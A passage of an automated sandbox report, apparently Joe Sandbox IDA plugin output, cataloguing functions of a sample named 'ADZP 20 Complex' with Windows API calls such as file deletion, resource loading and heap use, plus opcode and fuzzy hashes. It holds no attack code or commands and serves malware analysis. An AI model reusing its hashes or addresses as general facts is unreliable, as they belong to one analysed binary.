                    • Opcode ID: 85bd719b3417c84e9721a3e665a4c187715772ca533533566ef874ce4e5cb792
                    • Instruction ID: 6d1e308804f6dc32779c3279b2fcfe03024d17212ecc119a6d6b7423f9e5f936
                    • Opcode Fuzzy Hash: 85bd719b3417c84e9721a3e665a4c187715772ca533533566ef874ce4e5cb792
                    • Instruction Fuzzy Hash: C951D7B66052007AE500BBB39D82D7F626DDBC571CB108C3FB440650E3EA3D9D616A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Function 0040B6A0, 18 basic blocks (node ids 848-865 in the original graph image; executed / not-executed colouring not preserved). API call sites: SetFilePointer (40b6c0), memcpy (40b711), WriteFile (40b775; present in the graph but absent from the APIs list below); internal call to 0040B0C0.
                    APIs
                    • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B6D8
                    • memcpy.MSVCRT ref: 0040B712
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FilePointermemcpy
                    • String ID:
                    • API String ID: 1104741977-0
                    • Opcode ID: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
                    • Instruction ID: c1513f54f6ae5569788c36180188ddc2abd705510cfe10eedfb0010ba837d0d9
                    • Opcode Fuzzy Hash: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
                    • Instruction Fuzzy Hash: DA312A3A2047019FC320DF29D844E9BB7E5EFD8714F04882EE59A97750D335E919CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Function 0040E900, 9 basic blocks (node ids 866-874 in the original graph image; executed / not-executed colouring not preserved). API call sites: TlsGetValue (40e900), RtlReAllocateHeap (40e941), HeapReAlloc (40e990).
                    APIs
                    • TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                    • RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E967
                    • HeapReAlloc.KERNEL32(02200000,00000000,?,000FFFF6), ref: 0040E9B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$AllocAllocateValue
                    • String ID:
                    • API String ID: 1566162415-0
                    • Opcode ID: 2f886b1653eeaf8e6e176882be529ab5a4d9cbf2fb84908f11b91f3f387303a9
                    • Instruction ID: 5ee2f831fd0b69a5072d4afb15d4d8d3f7e606a336c6d63425544261b24b472a
                    • Opcode Fuzzy Hash: 2f886b1653eeaf8e6e176882be529ab5a4d9cbf2fb84908f11b91f3f387303a9
                    • Instruction Fuzzy Hash: 35319674A00108EFCB00CF98D594A9DBBF5FB48314F24C1A9E855AB395D731AE51DF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Function 0040E560, 4 basic blocks (node ids 875-878 in the original graph image; executed / not-executed colouring not preserved). API call sites: TlsGetValue (40e560), RtlAllocateHeap (40e589), RtlReAllocateHeap (40e5a6); internal call to 0040EA40.
                    APIs
                    • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                    • RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                    • RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateHeap$Value
                    • String ID:
                    • API String ID: 2497967046-0
                    • Opcode ID: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
                    • Instruction ID: 56fdceb44a62e96a78129ec9cee9786d08dacee7710f0624d62ab86a2b9feb41
                    • Opcode Fuzzy Hash: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
                    • Instruction Fuzzy Hash: 6011E974600208FFCB04CF99D894E9ABBB6FF88314F20C569E8099B354D734AA41DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Function 0040AD45, 10 basic blocks (node ids 881-890 in the original graph image; executed / not-executed colouring not preserved). API call sites: wcsncpy and wcslen (40ad54), CreateDirectoryW (40ada8), reached from a loop over blocks 40ad88-40ada6. The APIs list for this function is empty in the report, so these calls are recoverable only from the graph.
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CreateDirectorywcslenwcsncpy
                    • String ID:
                    • API String ID: 961886536-0
                    • Opcode ID: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
                    • Instruction ID: 2d24f661812d06aabf4acf2af4a599dd38efaf3f9e777f7594d650cf82d0c1de
                    • Opcode Fuzzy Hash: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
                    • Instruction Fuzzy Hash: 9A01DBB0401318D6CB65DB64CC89AFE7379DF04301F6046BBE815E25D1E7389AA4DB4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Control-flow graph (graph image not preserved): a single basic block 408dee-408e26 calling memset, InitCommonControlsEx and CoInitialize.
                    APIs
                    • memset.MSVCRT ref: 00408DFB
                    • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                    • CoInitialize.OLE32(00000000), ref: 00408E1D
                    Similarity
                    • API ID: CommonControlsInitInitializememset
                    • String ID:
                    • API String ID: 2179856907-0
                    • Opcode ID: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                    • Instruction ID: 955719fea0046c6293a44e32614ed026eb147d3324017d94785fb64326744d49
                    • Opcode Fuzzy Hash: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                    • Instruction Fuzzy Hash: FDE08CB088430CBBEB009BD0EC0EF8DBB7CEB00315F4041A4F904A2280EBB466488B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040DB18: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
                      • Part of subcall function 0040DB18: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E
                    • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000), ref: 0040B473
                    • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B495
                    Similarity
                    • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                    • String ID:
                    • API String ID: 3705299215-0
                    • Opcode ID: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
                    • Instruction ID: 11d32f41a61cd8df30a66e4113f3bfff31ba723ad3a0b0249673477e2beeffa2
                    • Opcode Fuzzy Hash: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
                    • Instruction Fuzzy Hash: 62119371200304ABC2305F1ADC44B57BBF8EBC5764F14823EF565A37E1C77599158BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E3B9: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040E277,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 0040E3FA
                    • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
                    • memset.MSVCRT ref: 0040E2D1
                    Similarity
                    • API ID: Heap$AllocateFreememset
                    • String ID:
                    • API String ID: 2774703448-0
                    • Opcode ID: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
                    • Instruction ID: 6d5d9c53e9755405ffb3e8ab18b4b48e318f9db4ecaa07005482283559b0ef73
                    • Opcode Fuzzy Hash: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
                    • Instruction Fuzzy Hash: 5D117F72504314ABC320DF0AD944A4BBBE8EF88710F01492EF988A7351D774ED108BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B093
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B09B
                    Similarity
                    • API ID: ChangeCloseFindFreeHeapNotification
                    • String ID:
                    • API String ID: 1642550653-0
                    • Opcode ID: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                    • Instruction ID: 7abf06afc9ef833db34d05f69b67e4dbbe1385027aa9b24abf0250c41048a97e
                    • Opcode Fuzzy Hash: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                    • Instruction Fuzzy Hash: 1AF08C32505110ABC6322B6AEC09E8BBA72EF81724F148A3FF125314F4CB794850DF9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • wcslen.MSVCRT ref: 0040E78E
                    • RtlAllocateHeap.NTDLL(02200000,00000000,?,?,00000000,00000000), ref: 0040E7A9
                    Similarity
                    • API ID: AllocateHeapwcslen
                    • String ID:
                    • API String ID: 1345907364-0
                    • Opcode ID: 72c8991afff95364d9171c38dd98e6fe33221a3a1fadc299bdc7e95de95877d4
                    • Instruction ID: d40e0309548f3d2a4a525bb3e3ae8e28906eb34af4bb1b46d5d9fd1a2a98838f
                    • Opcode Fuzzy Hash: 72c8991afff95364d9171c38dd98e6fe33221a3a1fadc299bdc7e95de95877d4
                    • Instruction Fuzzy Hash: 83F05EB5600208FFCB04DFA5D880E9A77B9EB88718F10C46DF9088B390D635EA01CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetFileAttributesW.KERNEL32(00000002,00000080,0040AE72,02209F70,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040AE50
                    • DeleteFileW.KERNELBASE(00000000,0040AE72,02209F70,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040AE5A
                    Similarity
                    • API ID: File$AttributesDelete
                    • String ID:
                    • API String ID: 2910425767-0
                    • Opcode ID: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                    • Instruction ID: 9bbbf45483326d305172a49cd8f3e34a401707f8027ad8c24340846d3084d85d
                    • Opcode Fuzzy Hash: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                    • Instruction Fuzzy Hash: 36D09E30488300BBD7555B20DD0D75B7EA16F90745F08CC79B585610F1C7788C64EB4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
                    • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7
                      • Part of subcall function 0040ED40: HeapAlloc.KERNEL32(02200000,00000000,0000000C,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED4E
                      • Part of subcall function 0040ED40: HeapAlloc.KERNEL32(02200000,00000000,00000010,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED62
                      • Part of subcall function 0040ED40: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED8B
                    Similarity
                    • API ID: AllocHeap$CreateValue
                    • String ID:
                    • API String ID: 493873155-0
                    • Opcode ID: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
                    • Instruction ID: 280f0189a1b64710240dfbe11500258ab370f1237584088fdcd0bc4150eb2939
                    • Opcode Fuzzy Hash: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
                    • Instruction Fuzzy Hash: F1D012705C83046BE7002BB2BC4A7843A78DB04751F20843AFA095B3D0DAB45480895D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00403F00,00000001,00000002,00000000,00000000,00000000), ref: 0040A412
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,?,?,00000000,00403F00,00000001,00000002,00000000), ref: 0040A432
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID:
                    • API String ID: 626452242-0
                    • Opcode ID: a30fc8ce1e8d09fb33b6fb0615b8e378ebe935ed8b67f93c539b2d5397848702
                    • Instruction ID: fedc1c205319a766e10bd101b7b911e6f787ac623343fea3eb012fc010ddeeec
                    • Opcode Fuzzy Hash: a30fc8ce1e8d09fb33b6fb0615b8e378ebe935ed8b67f93c539b2d5397848702
                    • Instruction Fuzzy Hash: 0A3164361083056EC7349E799C80B7BB799EF80324F144B3FFEA1262C1D6789821976A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                    • GetShortPathNameW.KERNEL32(02209F70,02209F70,00002710), ref: 00402BE0
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040A200: HeapFree.KERNEL32(00000000,00000000,00401B7C,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0040A20C
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                      • Part of subcall function 0040E5F0: RtlFreeHeap.NTDLL(02200000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Similarity
                    • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                    • String ID:
                    • API String ID: 192546213-0
                    • Opcode ID: 4ffc8271a727788d72dbd82b9e7b130440edac90e55bf10bd88016aa18fcca3f
                    • Instruction ID: cfcced4fe20ace1cb9c77e507b1d6c1eac9b345b0de8df7ff04b6d7fabcc8d03
                    • Opcode Fuzzy Hash: 4ffc8271a727788d72dbd82b9e7b130440edac90e55bf10bd88016aa18fcca3f
                    • Instruction Fuzzy Hash: ED012975108205BAE501BB72DD06D3F7669EF80718F108C3EB444B50E2EA3D9C616A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040B088,00000000,00000000,?,?,00403394,00000000,00000000,00000800), ref: 0040B0E7
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                    • Instruction ID: 9ab85608ef899c62796374e569d53c100cb89dcb0d5a9370bd5502097d7715ab
                    • Opcode Fuzzy Hash: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                    • Instruction Fuzzy Hash: F4F0F276104601AFD320CF58D808B87FBE8EB48321F00C82EE59AC2A50C730E810DB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402B89
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
                    • Instruction ID: 9093739e4f63ff22c3e940b982bbbee8e150dd58fd9266ea6ee1473296d97692
                    • Opcode Fuzzy Hash: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
                    • Instruction Fuzzy Hash: EBD0C26041810846D710BE658509B9B73E8D700304F608C3AE084961C1F3FCE9D5821B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlFreeHeap.NTDLL(02200000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: 4a1186e03504991e415e8e092ef0052a0ef4c47318b2f6512a59703c6ea9925b
                    • Instruction ID: cd5ef850ad68aae2c27baef3402967596087f0f1f33355341870062cdd1dbcb2
                    • Opcode Fuzzy Hash: 4a1186e03504991e415e8e092ef0052a0ef4c47318b2f6512a59703c6ea9925b
                    • Instruction Fuzzy Hash: 4ED0C9B2144218BFE614DB96FC58FF7776CE794750F50C82AFA048A1D0CA769890CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                    • Instruction ID: b6192ce9428b1ba2f4eef992fd110c0ccadf60e3b61bfdacf1c665f796a5839f
                    • Opcode Fuzzy Hash: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                    • Instruction Fuzzy Hash: 97C04C713442006AE6509B24DE09F5776A9BB70742F00C43A7545D11B4DA31D860D72D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                    • Instruction ID: 5a0dfe59a05c5f03c374f6d2b2c7d0e1199ed08054282bce4923ddabcda8d052
                    • Opcode Fuzzy Hash: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                    • Instruction Fuzzy Hash: 10B012702C43005AF2500B209C0AB8039609304B43F304024B2015A1D4CAF01080852C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000), ref: 00402675
                    • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402685
                      • Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                      • Part of subcall function 0040A300: memcpy.MSVCRT ref: 0040A310
                    • FreeResource.KERNEL32(?,02209F70,02209F70,00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 004026B4
                    Similarity
                    • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                    • String ID:
                    • API String ID: 4216414443-0
                    • Opcode ID: eb9f5e1a2f9d4593073a7ec5f81ff8e9b0a970554bd78e40bca009d4aa2b3f01
                    • Instruction ID: 5824db8a20ede0dd59727c61e03ef1c30c3ca7ac97c8101ba0d9721411e394a8
                    • Opcode Fuzzy Hash: eb9f5e1a2f9d4593073a7ec5f81ff8e9b0a970554bd78e40bca009d4aa2b3f01
                    • Instruction Fuzzy Hash: C9F0F871018305EFDB01BF61EC0182EBEA1FB54304F108C3EF488511B1D7378868AB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Similarity
                    • API ID:
                    • String ID: L@A
                    • API String ID: 0-2003014581
                    • Opcode ID: fcece218acb953ec57727b535a22294843431f2901f4321beebd5a4c2ced4c5c
                    • Instruction ID: 760e5a69b99611532abf888ee3aa0c8fba98c8b8d08d5900a10969fbbe7fd4b0
                    • Opcode Fuzzy Hash: fcece218acb953ec57727b535a22294843431f2901f4321beebd5a4c2ced4c5c
                    • Instruction Fuzzy Hash: C042AD706047429FD724CF19C54472ABBE0BF84304F14863EE8589BB91D379E99ACF8A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00405593
                      • Part of subcall function 0040552C: memset.MSVCRT ref: 0040553B
                      • Part of subcall function 0040552C: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
                      • Part of subcall function 0040552C: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
                    • GetVersionExW.KERNEL32(?), ref: 004055F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Version$AddressHandleModuleProcmemset
                    • String ID:
                    • API String ID: 3445250173-0
                    • Opcode ID: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
                    • Instruction ID: 26d0d35871443cf73a281a40cb18e3271032821f4299fa5ffe9ef0f91627ffe6
                    • Opcode Fuzzy Hash: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
                    • Instruction Fuzzy Hash: 9B31BF32924F1882D23085648D45BB76AA4E751760FD90F37DD9EB72E0D23F8D458D8E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00409F70,00401180,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000), ref: 0040A0EC
                    • SetUnhandledExceptionFilter.KERNEL32(00401180,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040A100
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: b7e867c821acaf844bbdab562fa5546bc418851262dc6eefeb18a67462b4137d
                    • Instruction ID: ed707b84e897ebd9365ef63bb97156212438ba645da498dcb76798098b5433cd
                    • Opcode Fuzzy Hash: b7e867c821acaf844bbdab562fa5546bc418851262dc6eefeb18a67462b4137d
                    • Instruction Fuzzy Hash: 76E0C2B2508380FFC3108F20E94C687BBF4BB55741F00C93EA80A927A0CB748852EB1E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID:
                    • API String ID: 3510742995-0
                    • Opcode ID: acd0e2443a16ad88af06146353a72dec412846ba3d60e1a872444779584cfac7
                    • Instruction ID: 7648e4874b510db5dc64b48861a8ad0d1bcfa4dcae448a9e57b277cf71a217b0
                    • Opcode Fuzzy Hash: acd0e2443a16ad88af06146353a72dec412846ba3d60e1a872444779584cfac7
                    • Instruction Fuzzy Hash: 43D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID: hAA
                    • API String ID: 0-1362906312
                    • Opcode ID: 7fc8c6075135f61b4e465a5350afc3a94afa5303be66dee6bc8774c12ebf2cec
                    • Instruction ID: 061b60707f08a323de6ca22a374bc66059e0427017f59017a69891467563d259
